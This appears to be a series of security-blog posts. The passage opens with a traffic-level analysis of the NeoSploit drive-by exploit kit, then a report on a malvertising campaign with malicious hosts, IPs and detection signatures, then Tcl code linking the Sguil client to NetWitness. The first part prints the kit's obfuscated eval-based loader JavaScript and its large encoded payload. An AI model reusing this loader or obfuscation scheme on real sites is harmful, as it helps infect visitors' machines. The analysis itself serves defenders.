48@1ed698@e5d72#a!5b2#2#5d660~7dd12#f#c3@2#f#ca!50~464596ebb0~2#0~2#c0~3@f#60~5e140~95d719f#4cb69a!f#">
<input type="hidden" id="xe" value="4">(P_)(MT)(GZ)
</body>
</html>
This response causes the client to ask the server for the contents of the rnrt.js file, so the next request is made:
GET /ar/rnrt.js HTTP/1.1
Accept: */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Connection: Keep-Alive
This delivers the following response, which contains the JavaScript that deobfuscates the data held within the hidden HTML input tag with the id “GVaV”:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 652
Content-Type: application/javascript
Date: Mon, 02 Aug 2010 <REMOVED>
ETag: <REMOVED>
Keep-Alive: timeout=1, max=99
Last-Modified: Mon, 02 Aug 2010 <REMOVED>
Server: Apache/2
Vary: Accept-Encoding,User-Agent
var _ryf=new Object();function hmww_(id){return (_ryf[id])?_ryf[id]:_ryf[id]=document.getElementById(id);};function OUWD(){var ZpG=String;var fnuk=Math;var pbRy='floorwuBYZXz'.replace(/[wuBYZXz]/g,'');var vPkaT=16;var YQu_='fromCnSTzBk'.replace(/[nSTzBk]/g,'')+"harCo"+"VwAdenygv".substr(3,2);var JbG=256;var Bau_=ZpG("evhwv".substr(0,2)+"al");var ru_bz=this;var GVaV=hmww_("GVaV").value;GVaV=GVaV.replace(/[\~@#\!]/g,'');var U_CZ=[471,541,759,116];var zRQQ="";for(var gn_=0;gn_<GVaV.length/2;++gn_){var C_YL=parseInt(GVaV.substr(gn_*2,2),vPkaT)-(gn_+2)*U_CZ[gn_%4];if(C_YL<0){C_YL-=fnuk[pbRy](C_YL/JbG)*JbG;}zRQQ+=ZpG[YQu_](C_YL);}ru_bz[Bau_](zRQQ);}
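Stripped of its name mangling, OUWD() removes the filler characters ~ @ # ! from the GVaV value, reads the rest as hex byte pairs, subtracts a position-dependent key from each byte, wraps the result into 0..255 and evals the resulting string. Here is an added example (not code from the original post or from the kit) that reimplements that decoder in Python and returns the decoded text instead of executing it. The key and the short ciphertext prefix are taken from the rnrt.js and putyq.php responses printed above; the encoder and the round-trip plaintext are constructed for testing.

```python
"""Added example (not from the original post): Python reimplementation of
OUWD() from rnrt.js, with the final eval() replaced by returning the text."""
import re

KEY = [471, 541, 759, 116]     # U_CZ in the script
NOISE = re.compile(r"[~@#!]")  # the characters the script strips first

def decode_gvav(value: str, key=KEY) -> str:
    """Strip filler, read hex byte pairs, subtract (i+2)*key[i%4] and wrap into
    0..255.  The script's  C -= floor(C/256)*256  for negative C is exactly
    Python's  C % 256."""
    hexdata = NOISE.sub("", value)
    out = []
    for i in range(len(hexdata) // 2):
        c = int(hexdata[2 * i:2 * i + 2], 16) - (i + 2) * key[i % 4]
        out.append(chr(c % 256))
    return "".join(out)

def encode_gvav(plain: str, key=KEY, filler="~@#!") -> str:
    """Constructed inverse transform for testing: add the key, emit hex, and
    sprinkle the same filler characters the kit uses (ignored on decode)."""
    out = []
    for i, ch in enumerate(plain):
        out.append("%02x" % ((ord(ch) + (i + 2) * key[i % 4]) % 256))
        if i % 3 == 2:
            out.append(filler[i % len(filler)])
    return "".join(out)

# The first 44 characters of the GVaV value served by putyq.php in the post.
GVAV_PREFIX = "12#c63@f#b9773@0~2#68@8@94b60~64d3@618@98@db"

if __name__ == "__main__":
    print(repr(decode_gvav(GVAV_PREFIX)))
```

Decoding that prefix yields the opening of a document.write( call, which is how the landing page injects the content it later uses to profile the browser. Because the key is indexed by position, the same plaintext byte encodes to different hex pairs at different offsets, so a static content match on the encoded value is not useful; decoding first, as here, is.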
Upon execution of this JavaScript, the client POSTs information back to the server about what type of exploits to serve up. The JavaScript attempts to determine whether the host has Acrobat or Java (among other things) installed, and then the appropriate malicious PDF or Java class is served to the client.
POST /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Content-Length: 40
Connection: Keep-Alive
Cache-Control: no-cache
id=53104c390ee1ebc861a1938a5958ea63%26np
The value at the end of the id is what tells the drive-by which types of exploits to serve up. In this case the “np” at the end means “no java” and “yes pdf”. The suffix can take the following values:
np = no java, yes pdf
jp = yes java, yes pdf
n = no java, no pdf
j = yes java, no pdf
The response to this POST contains the following obfuscated data, which is processed and deobfuscated again by the rnrt.js file:
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 9310
Content-Type: text/html
Date: Mon, 02 Aug 2010 <REMOVED>
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14
<html>
<head>
<script src="rnrt.js"></script>
</head>
<body oz_ljh_h onload="OUWD();" zub>(LR)(X_)(YP)
<input type="hidden" id="_x" value="4">(BH)(TJ)(SY)
<input type="hidden" id="GVaV" value="14#cc4#a!#@~a!#@~77e34#278@28@6b20!24#53226d8@23924#f75ffe0!10!96b74#a!#@~78@739252f94#166bf1fe53f50!da!#@~0!a!#@~bcbc4#0!e696df8@57ca!#@~a!#@~5f395f4#18@1624#34#a!#@~172116e0!4#f55f6a!#@~fe4#f8@0!e76f536a!#@~18@f9ce0!c617bf4#6a!#@~4#264#7d573b2a!#@~0!4#d57c1d9b7259635320!4#59766db1ef20!0!cca!#@~c62f5a!#@~a!#@~a!#@~c5d4#b38@69530!3b29727ff2e8@1de350!0!b0!9fa!#@~8@cbbea!#@~8@f4#990!72fdbd9b510!d3179577c621fdbc91d2df62d4#6cf8@eb2eba!#@~b4#fd953d26375e99d318@a!#@~318@10!0!2bd21b8@f4#92f2c5ba!#@~96efb794#e27f74#3a!#@~14#fa!#@~91c0!215a!#@~5e7613e4#76ba!#@~6e71f3fcd6c4#75367e515278@c4#bf8@f0!e18@68@f8@3390!17355997e8@95a!#@~f62d5d365e594#0!f9ef0!61cd8@1f50!c56d670!2ce76ff5cb30!f73e58@5168@620!279be9d4#4#ea!#@~97e4#0!2a!#@~8@28@6b5f556f5eeed1a!#@~9395a!#@~ff8@e30!a!#@~9674#4#c70!76595a!#@~f8@5260!b77232255c8@b0!ef5b8@12b1da!#@~0!3c58@15c270!2956a!#@~7a!#@~637e3528@e221e1397ee79de90!90!1b8@3f7de64#fa!#@~3f3c65dfd699126fedd6df670!18@56b90!d6f0!58@7662c1659a!#@~68@6de2e0!f0!eccbc2d92a!#@~2d4#d8@0!a!#@~3e8@72c68@5c778@2ea!#@~3cf4#cc58@0!91b37d5a!#@~0!b79d4#5d0!b6f9b7664#50!de8@4#f61a!#@~594#64#170!6cf31a!#@~d758@4#0!e7cccf0!f65a!#@~d34#0!8@74#f7dd9a!#@~629cd5f75bbefda!#@~66c9964#8@4#2a!#@~2b9c4#297a!#@~3b2dbe0!28@99dc514#0!50!ba!#@~fe8@3e78@90!a!#@~c8@70!0!6a!#@~8@0!e1734#65d7de9112694#15cff327cbda!#@~b98@94#2a!#@~98@8@c2a!#@~4#94#5c0!b2d5d365d56ffcee2fbdb8@f0!9630!2a!#@~3a!#@~5f9cd71ba!#@~4#1b14#0!5be24#bc4#7d0!a!#@~5cd0!d58@20!3937f3f24#8@3d5a!#@~a!#@~b4#293a!#@~23e219919a!#@~73a!#@~fa!#@~1f78@4#7b0!1367b8@594#b14#56cf31ef73a!#@~4#bddcec29651ddd216a!#@~6be956e3a!#@~94#73ce63310!f33124#518@758@be8@d99712197f4#0!6cea!#@~34#9ce0!c61bbf669528@27d58@0!e9a!#@~c514#9c0!beb5399255370!963bc5fa!#@~53f13118@0!0!a!#@~67916a!#@~92d4#f8@7198@375a!#@~60!658@ee0!0!511a!#@~a!#@~18@1f0!73ec8@e1e6774#5d0!a!#@~9fcc1998@0!0!e357556795c2b2b0!71530!f3714#914#c3b9f0!f8@8@d21719d1b7a!#@~db9d34#a!#@~4#1a!#@~4#7bb0!1dc7190!550!30!0!64#a!#@~78@2297a!#@~3b2dbdfc5d9
7d8@18@0!2dd6fa!#@~350!797fbcbbb95b8@3132e355631e718@e3bd54#fef2e8@cbd0!c4#3df8@7fa!#@~1d8@b8@8@e574#220!6b324#a!#@~9e4#0!0!3fd0!f18@ca!#@~0!a!#@~3c0!b98@a!#@~dea!#@~e171ff69bc0!26de18@d18@b70!b27b0!17bd4#ea!#@~57730!d8@8@7d8@a!#@~2d10!6f0!e2db138@4#8@ec2f9a!#@~9fa!#@~9cca!#@~4#38@66c52a!#@~2e74#616a!#@~e6e2528@5ed3d5b67a!#@~0!f998@6c2bbb59d652fa!#@~0!4#17c6f38@f9d8@ed20!d37b8@932d5dbfcda!#@~6bf34#6f57a!#@~9bedb758@eb629ed4#4#6ca!#@~7ca!#@~c63565eb50!8@6f2a!#@~922fe50!8@57be71a!#@~bf31d10!ca!#@~0!a!#@~6f8@299d7910!6759530!6a!#@~54#4#38@bf0!2d4#6ef2c0!5124#bd7e8@dd9c3e8@2b8@f9bba!#@~17723277754#7c621f27171a!#@~4#0!e9674#a!#@~1bcdc9f8@f28@a!#@~2132d36d8@1e0!a!#@~a!#@~2a!#@~d958@79fd34#8@d5cd8@8@ff8@1159a!#@~38@8@d1291be0!a!#@~d155b54#a!#@~5c9b7e4#65992f3c4#18@56fb0!3939cb4#0!f90!94#398@d5f58@30!ccda!#@~9df9c8@d7957f4#69659768@6119f3f8@21e96b50!fdd5a!#@~bc4#f58@90!754#b5597fa!#@~c914#5bf20!8@9f91bb0!4#9c9930!8@25b5d37c1d692f0!cdd39a!#@~764#b925e7d8@b1d94#368@71a!#@~9bbc0!4#d95fb34#4#54#957c4#0!519cf1ce10!50!f90!d9b96b20!998@9e378@757523ec6d297f7c2df9f7d4#0!9e5374#8@0!19993d8@c1690!b30!9d554#ba!#@~4#950!9a!#@~734#55d91f8@c31c55f0!0!2979bb90!e94#933e8@c535735cbde9cfec7db94#74#4#59a!#@~58@7b8@5159e34#8@11295ba!#@~0!ed159b14#e5c9f7a!#@~4#a!#@~5996ffc8@18@5a!#@~f70!79390!b0!0!390!98@358@15f5c3cc0!da!#@~91f5ccd7997b4#a!#@~965d728@a!#@~11933b8@61e9a!#@~b10!3dd5eb8@4#358@94#714#f559bf6cd14#5ffe0!c9f95b70!8@9c9d3c8@65b5133c5d696fcc1d39e72d0!20!937b6dee28@31ccff733ced1c27c3eb18@5dbb14#e5c4#224#21395a!#@~5b0!bfa!#@~f91526a!#@~11e8@6f3a!#@~660!b28@e6d0!a!#@~6f68@38@5bd58@91690!4#8@76d51a!#@~7f2eb978@f30!b8@8@d8@a!#@~8@0!24#bf0!19e2238@b6a!#@~b4#e5ecde97b8@3b373d5d5eb4#10!2dba!#@~28@ecf4#169eca!#@~c0!7a!#@~16a!#@~0!9ddb7f8@3662a!#@~f8@5c358@674#4#10!0!e7df18@d0!4#354#f1a!#@~0!a!#@~1c9c8@7a!#@~0!0!37a!#@~e4#552b28@8@10!bb2b5ced13934#0!ba!#@~660!c198@cc28@8@fc50!23f4#d520!8@16ba!#@~8@f9e2d790!cb3250!64#998@ec4#4#16a!#@~ea!#@~38@1c38@4#6a!#@~efa!#@~0!0!a!#@~c26d0!d50!397a!#@~ca!#@~55e
0!8@8@8@7dc177694#51ceb4#514#735f27edca!#@~e0!0!4#b0!2b4#bde8@0!8@7bfb550!eb3c8@c253fa!#@~d68@f8@9a!#@~174#bc8@f2962b90!5a!#@~0!6fc6cb673e33b0!6f2be0!0!6b5f90!d8@c8@cf78@a!#@~c1a!#@~4#e5370!8@1c124#4#bd8@2b0!c18@2ea!#@~be4#e0!9617b8@b7ee8@79c8@54#20!4#7c50!a!#@~6794#c25ffe8@28@f55b5d0!4#c5b6d0!e0!95134#3bc6770!b39f38@c632790!0!2ca!#@~8@50!dc8@60!f33a!#@~8@da!#@~8@b10!70!3dffe4#4#59673c0!15f3e99ce54#f5d78@b5a!#@~bcd54#8@90!e3b38@5b5eb71720!c72fe8@fd2297d1cd7210!a!#@~694#ce8@4#8@1672a!#@~fb6230!9374#34#0!5e7e0!10!d54#25ceca!#@~8@a!#@~5c3d57bf63ca!#@~94#8@52b38@b10!bb2b5ced13934#0!ba!#@~660!c198@cc28@8@fc50!23f4#d520!8@16ba!#@~8@f8@ded78@9c4#38@4#b6d9b8@ec4#4#0!6cea!#@~38@1d394#6a!#@~cf8@0!5a!#@~224#dcd0!0!699a!#@~ca!#@~55f0!c8@8@75ba!#@~7c64#4#517ef4#0!1572631ce8@ced30!0!b52650!e0!8@0!8@ec2b0!55e234#8@c253fa!#@~d68@f79c174#ec9f2922690!58@0!4#fc67b0!73e23b0!6ecb90!8@6260!94#d5bedc77a!#@~0!1f4#8@5270!7bbb294#0!dd38@0!0!1d3a!#@~9fe1e4#94#13bdb4#eb8@7a!#@~18@d4#20!0!755a!#@~9e7750!20!0!1eb28@fc5d5711cdb2d0!e598@0!e4#4#c0!696a!#@~b8@9d36c62c790!a!#@~22a!#@~0!54#d97e14#31a!#@~4#da!#@~8@8@0!c7736ffee4#0!9d6fc0!15f2e8@9ce54#e5f78@b5a!#@~a!#@~cc54#8@c0!93b355663a!#@~f1125c323edf520!97c9c4#770!ba!#@~594#db7f8@76d2a!#@~0!0!64#30!8@b6b3e0!0!e7df15d0!4#b5ceca!#@~59fcdc8@77fe37a!#@~c4#552b4#8@c10!ba!#@~265ce50!e98@38@b56b1114#8@7c8@7bfa!#@~5c1ef9d120!8@4#6ca!#@~8@f8@e0!d78@ecb3250!6598@8@ec4#4#0!65ea!#@~4#0!2330!4#ba!#@~cfe0!0!a!#@~71fd5d0!0!a!#@~97a!#@~ca!#@~55e0!8@8@8@75bc7b64#4#517f54#0!1b725f21e4#d3d3fdb4#324#7d98@4#8@7bbb8@54#de399520!4#2a!#@~d68@fb9b174#9c4#f78@b259558@ff0!8@67a!#@~a!#@~78@dd360!6ecb8@0!56268@9dd0!c3d375a!#@~0!274#e4#8@757a!#@~c324#4#bd62b0!515339fe1e4#9613bdb4#ea!#@~8@7998@4#4#7fb7555a!#@~66f54#24#fa!#@~ec2cf0!5e5c0!4#c7b8@cbe8@970!e4#6c260!71bb98@3dcc277b0!8@22a!#@~256d0!8@6162ca!#@~7e0!8@3127a!#@~36ffe94#0!9b77c0!1a!#@~fa!#@~dfa!#@~4#ea!#@~4#a!#@~5f8@3b0!a!#@~bcc5c8@0!0!73f3950!63b4#1620!bf27edf0!21a!#@~1c4#c57614#a!#@~0!95d38@37c652ef8@58@378@c673c0!a!#@~
e2e0!15d8@3e54#f0!a!#@~59a!#@~c8@cd79f63ca!#@~94#652b0!8@515a!#@~e24#61e4#0!a!#@~98@3db9660!c18@8@5c28@7f8@50!23f3d120!7f69a!#@~cf0!dbdc8@ec0!3b5760!9a!#@~9bbf4#165ee331d34#4#a!#@~a!#@~7fb0!6a!#@~227dbd0!0!393b5a!#@~0!5f0!8@9270!bb7b6c4#0!1bf74#0!1a!#@~7a!#@~5f24#ea!#@~ca!#@~dd0!3b0!2b4#be0!8@0!8@7c0!b550!e334#9520!3fa!#@~76df0!9f234#4#ca!#@~fd8@b259556ff0!164#a!#@~f73e53b0!6ecb90!a!#@~6260!94#d5beda!#@~79a!#@~0!274#f4#8@757a!#@~c124#4#5d630!0!0!1d3b9fe1e594#13c0!b4#e68@e9c8@0!4#e0!670!5ca!#@~56f592dfa!#@~e8@2df8@565c0!8@c9b2d0!e5960!e4#4#c16a!#@~6a!#@~bba!#@~230!d22e74#0!526a!#@~350!d58@214#2ca!#@~5de8@f0!8@753a!#@~0!3e4#4#79a!#@~6bc8@15eee7a!#@~6e0!565978@b5a!#@~bd254#8@50!73f30!5764#a!#@~f1629ba!#@~2bf2f0!219cc4#c57610!a!#@~0!95d38@97c6c31f35d358@c67390!4#e7db1ddd3e54#f0!a!#@~99a!#@~d0!d370!fb3bb0!4#0!5da!#@~f8@0!15b324#5ce50!e9f38@b56a!#@~0!b14#8@5c68@0!f0!5523f7cc28@7e63b1f4#d6df8@9c0!395160!98@95bf4#366ea!#@~3a!#@~20!30!53a!#@~df4#0!7a!#@~a!#@~1bd7d6fe97b3a!#@~0!610!98@8@7a!#@~c0!776b4#612f54#610!75651ce7d5d30!4#b8@2651e18@0!8@dc6b0!5ce22f932b3a!#@~b0!6ef0!a!#@~3234#4#cdfb8@b28@9a!#@~4#e0!4#0!16ca!#@~a!#@~8@0!e4#30!0!becbd0!0!696190!d7ca!#@~cf73a!#@~c1a!#@~4#a!#@~4#e70!7dc224#4#cda!#@~2b0!a!#@~1d2ea!#@~a!#@~e7e0!9617b8@b7f18@7a!#@~18@64#20!8@7c50!a!#@~b78@4#c28@0!4#e32df5625711ccb2d0!e5990!e4#6c260!71bf98@37d2277b0!622a!#@~0!55da!#@~7e1c37a!#@~0!df8@8@1170!3bfbef4#0!976fcb10!f3e3a!#@~5e0!4#f578@4#b0!a!#@~bcb60!8@0!0!94#130!58@69a!#@~f1724#ba!#@~2a!#@~eef0!1ea!#@~2c4#cb790!ba!#@~b9bce8@68@260!2ff760!30!8@b6b390!0!e7df1cd0!4#354#f2a!#@~0!a!#@~7d0!c8@75fb4#1a!#@~4#4#557b38@0!18@b8@1f61e4#0!f933db66a!#@~0!7198@4#c778@ed4#d2dffcf67b1a!#@~99eefcc14#c8@0!8@4#4#4#16fda!#@~c30!530!a!#@~1de4#4#0!c68@8@9de3d4#1db5d18@d235d5e5d5a!#@~23ca!#@~1b0!efb8@9d8@25a!#@~e73b4#da!#@~8@a!#@~551210!3cef5bf674#91bb9ca!#@~d0!f8@98@24#6cc2698@2dc64#ebdd5d7bbbf27f5a!#@~d24#b0!e3d62f1a!#@~c20!4#54#e2ffa!#@~3d98@a!#@~4#d8@0!9ba!#@~ca!#@~b7dd528@b8@4#6b76a!#@~b28@3de16c0!25767e7f128@d259f5e6
2fcfcd7c3d37a!#@~98@dd9a!#@~b94#1bfa!#@~d72ced6598@0!60!7eb13f5d8@568@5f996b3fbd12cc161ba!#@~3563d4#8@613c4#4#765e6d58@3fc6b3a!#@~f2e14#fca!#@~a!#@~ef7592f18@de28@4#c8@9bbe8@f3c98@9c4#4#674#728@8@75eb4#960!f21f29ed25e8@0!b0!2a!#@~74#fe7cc11c778@5d393a!#@~94#73d1a!#@~b6c3a!#@~ded8@1f0!c7593e8@9da!#@~9">
<input type="hidden" id="ni" value="4">(GI)(VN)(_G)
</body>
</html>
This will cause the client to now make a request for the malicious PDF:
GET /ar/k_fgvu/_tvmwh.pdf HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, pplication/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Connection: Keep-Alive
If the client is vulnerable to the contents of this PDF, it may become infected with whatever payload the drive-by site is serving up at the time. Whether that is caught generally depends on the antivirus signatures for the current malware being distributed; unfortunately the detection rates are not nearly as high as you might think:
http://www.virustotal.com/estadisticas.html
Hopefully, if you have read this far, you have found it to be of some use.
We have identified several major websites (buy.com, cnbc.com, digg.com, evite.com and msn.com, just to name a few) using the advertising services of malicious servers that are using Acrobat PDF and Java exploits to force the download and installation of fake antivirus software. Analysis from SysAdMini @ www.malwaredomainlist.com has informed us that the sites are all using the NeoSploit drive-by kit. After further research, we found that Jiri Sejtko from Avast! had actually documented this and written a great blog entry about it back on Feb 18th, 2010. It is unbelievable that online advertisers the likes of yieldmanager.com, fimserve.com, advertangel.com, bannerimg.com, jambovideonetwork.com, myspace.com, zedo.com, vestraff.com and others allowed this to occur and even thrive for the better part of a month. The host names hosting the drive-by and fake antivirus software that we have discovered so far are:
google.analytics.com.bazqrhafrrh.info
google.analytics.com.bidxctvqvwrw.info
google.analytics.com.byuigracdnjj.info
All of these host names resolved to the following IP addresses at this time:
69.174.245.147
69.174.245.148
69.174.245.150
72.51.41.155
75.125.183.50
174.142.53.148
We have been observing this for a few days, and checking our repository of traffic shows that it goes back even further than Feb 15th, 2010. The signature that will most often trip on the download of the malware is this one:
ET POLICY Binary Download Smaller than 1 MB Likely Hostile
http://doc.emergingthreats.net/2007671
Once a client is infected, the following signatures trip:
ET TROJAN Potential FakeAV HTTP GET Check-IN (/check)
http://doc.emergingthreats.net/2010597
ET TROJAN Potential FakeAV HTTP POST Check-IN (?r=)
http://doc.emergingthreats.net/2010594
ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)
http://doc.emergingthreats.net/2002400
The infected client will attempt to check in to the following IP address/hostname:
79.135.152.5 – avgroupwebsite.com
195.88.190.54 – av-command.com/av-crew.net
This campaign seems to have been very effective and we know of thousands of hosts that have been exploited by this campaign.
We have finished up our first round of testing against the modified version of the Sguil client (we have modified the 0.7.0 CVS version). Using the alert information displayed in the Sguil client we create a query and feed it into the NetWitness API through a VBScript which calls explorer.exe and passes it a NetWitness URL. When you install NetWitness Investigator, it registers nw://<url> as a protocol handler within the OS. This URL is the API/method by which you can use alerting from other products to find specific sessions, IPs or timeframes of traffic to review, in any combination.
To do this, we first modified the Xscript section of sguil.tk and removed the transcript and Wireshark options, as we now rely on NetWitness for pcap capture instead of daemonlogger/sancp/tcpdump etc.:
# Xscript Menu
set eventIDMenut [ menu .eventIDMenut -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
-activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
$eventIDMenut add command -label "Event History" -command "GetEventHistory"
$eventIDMenut add command -label "NetWitness Src -> Dst" -command "NetWitnessEvent from"
$eventIDMenut add command -label "NetWitness Dst -> Src" -command "NetWitnessEvent to"
You can see that we are calling the command NetWitnessEvent and passing it a value of from or to. The reason for this is that a triggered event lists the source and destination IP address of the particular packet that caused the alert. However, NetWitness is session aware, so you may need to query using the source address as the destination and vice versa. This calls the NetWitnessEvent function that we have added to lib/extdata.tcl:
proc NetWitnessEvent { direction } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    # 5-tuple and timestamp of the selected alert (or SANCP session) row in the current pane
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
        set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
        set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    }
    # Search window: two minutes either side of the alert time, in the
    # YYYY-MM-DD+HH:MM:SS form the nw:// time= parameter expects, with the
    # colons percent-encoded as %3A
    set future [clock scan "2 minute" -base [clock scan $timestamp -gmt 1]]
    set past [clock scan "-2 minute" -base [clock scan $timestamp -gmt 1]]
    set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set future [regsub -all -expanded {[\:]} $future {%3A}]
    set past [regsub -all -expanded {[\:]} $past {%3A}]
    # "from" queries the session as alerted; "to" swaps src and dst, since
    # NetWitness is session aware and the alerting packet may be the reply
    if { $proto == "6" } {
        if { $direction == "from" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP%3A$dstPort&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+tcp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+tcp.dstport%3D$dstPort"
        }
        if { $direction == "to" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP%3A$srcPort&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+tcp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+tcp.dstport%3D$srcPort"
        }
    }
    if { $proto == "17" } {
        if { $direction == "from" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP%3A$dstPort&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+udp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+udp.dstport%3D$dstPort"
        }
        if { $direction == "to" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP%3A$srcPort&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+udp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+udp.dstport%3D$srcPort"
        }
    }
    if { $proto == "1" } {
        if { $direction == "from" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$srcIP+-%3E+$dstIP&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP+%26%26+ip.proto%3D1"
        }
        if { $direction == "to" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$dstIP+-%3E+$srcIP&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP+%26%26+ip.proto%3D1"
        }
    }
}
This function builds a different query depending on the protocol (TCP/UDP/ICMP only, currently) from the source/destination address and source/destination port. It looks for sessions matching those exact values and automatically opens them in NetWitness Investigator:

To replicate the SANCP session-type queries, we again modify sguil.tk, but this time the IPQuery Menu section:
# IPQuery Menu
set ipQueryMenu [ menu .ipQueryMenu -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
-activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
.ipQueryMenu add cascade -label "Quick Query" -menu $ipQueryMenu.quickMenu
.ipQueryMenu add cascade -label "Advanced Query" -menu $ipQueryMenu.advancedMenu
.ipQueryMenu add cascade -label "Dshield IP Lookup" -menu $ipQueryMenu.dshieldIPMenu
.ipQueryMenu add cascade -label "Nessus Report Lookup" -menu $ipQueryMenu.nessusMenu
.ipQueryMenu add cascade -label "NetWitness Query" -menu $ipQueryMenu.netwitnessMenu
menu $ipQueryMenu.quickMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.advancedMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.dshieldIPMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.nessusMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.netwitnessMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
$ipQueryMenu.netwitnessMenu add command -label "SrcIP/1 Hour" -command "NetWitness Src 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/1 Hour" -command "NetWitness SrcAsDst 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP/24 Hours" -command "NetWitness Src 24"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/24 Hours" -command "NetWitness SrcAsDst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/1 Hour" -command "NetWitness Dst 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/1 Hour" -command "NetWitness DstAsSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/24 Hours" -command "NetWitness Dst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/24 Hours" -command "NetWitness DstAsSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/1 Hour" -command "NetWitness SrcToDst 1"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/1 Hour" -command "NetWitness DstToSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/24 Hours" -command "NetWitness SrcToDst 24"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/24 Hours" -command "NetWitness DstToSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/5 Days" -command "NetWitness SrcToDst 120"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/5 Days" -command "NetWitness DstToSrc 120"
